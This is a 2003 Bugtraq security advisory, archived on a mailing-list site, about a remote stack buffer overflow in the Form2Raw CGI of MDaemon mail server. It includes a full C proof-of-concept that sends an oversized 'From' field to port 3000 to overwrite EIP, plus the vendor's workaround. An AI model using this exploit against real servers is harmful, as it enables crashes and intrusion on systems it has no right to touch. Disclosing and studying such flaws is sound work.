lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20031229195721.29292.qmail@sf-www3-symnsj.securityfocus.com>
Date: 29 Dec 2003 19:57:21 -0000
From: Hat-Squad Security Team <service@...-squad.com>
To: bugtraq@...urityfocus.com
Subject: [Hat-Squad] Remote buffer overflow in Mdaemon Raw message Handler




			Hat-Squad Security Team Advisory
			    http://www.hat-squad.com

Product: Alt-N Technologies Mdaemon Mail Server
Version: MDaemon  6.85 and Below to 6.52
Vulnerability: Remote buffer overflow in Raw Message Handler
Release Date: 12/29/2003

Vendor Status: 
Informed on 29 Dec 2003
Quick response on 29 Dec 2003

Overview:

FORM2RAW.exe is a CGI which allows users to send email using MDaemon from a web. It processes the fields of an HTML form and creates a RAW message File in the Raw queue Directory of MDaemon mail server. This file then will be proccessed and qeued for delivery by MDaemon.
According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the MDaemon server.If you want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI file".

Problem:

Sending more than 153 bytes  in the "From" field to FROM2Raw.exe creates a Raw File that when proccessed by mdaemon will cause a Stack buffer overflow.The EIP register will be overwritten when From Field length was 249 bytes.
The FORM2RAW.exe is accessible by default from WorlClient Web server listening on Port 3000.

---------------------Exploit:

#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment (lib,"ws2_32")
#define RET 0x1dff160
#define PORT 3000
void main(int argc, char **argv)
{
     SOCKET s = 0;
     WSADATA wsaData;

    if(argc < 2)
     {
          fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, " \
"\nUsage: %s <target ip> \n", argv[0]);
     
		  printf("%d",argc);
		       exit(0);
    }

     WSAStartup(MAKEWORD(2,0), &wsaData);

     s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

     if(INVALID_SOCKET != s)
     {
          SOCKADDR_IN anAddr;
          anAddr.sin_family = AF_INET;
          anAddr.sin_port = htons(PORT);
          anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);
               
          if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
          {
               static char buffer[500];
			   int i;
			   memset(buffer,0,sizeof(buffer));
			   strcpy(buffer,"get /form2raw.cgi?From=");
			   for(i=0;i<244;i++) {

				   strcat(buffer,"a");
			   }
			
			   strcat(buffer,"bbbb"); //Overwrites EIP
			   strcat(buffer,"c");	//One byte left after ESP :-(
			   strcat(buffer,"&To=me@...l.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");
			   
			   send(s, buffer, strlen(buffer), 0);
			   printf("Exploit Sent.");
		
          }

		  else printf("Error Connecting to The Target.\n");
          closesocket(s);
     }

	WSACleanup();
}

---------------------------------------

Vendor Response:

Robin Edwards <support@...pdesk.altn.com> Wrote: 

We have had a similar vulnerability report with Form2Raw and hope to release a patch soon.  In the meantime it is easy to disable Form2Raw by following the instructions below:
-----
To disable FORM2RAW open the 
\MDaemon\WorldClient\WorldClient.ini file with Notepad and 
delete the following two lines:

CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
 
Afterward, restart WorldClient to register the change.
-----


Credits:

This Vulnerability has been Discoverd By Pejamn Davarzani (pejman@...-squad.com) and Behrang Fouladi(behrang@...-squad.com) 


Original advisory could be found at:
http://hat-squad.com/bugreport/mdaemon-raw.txt


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ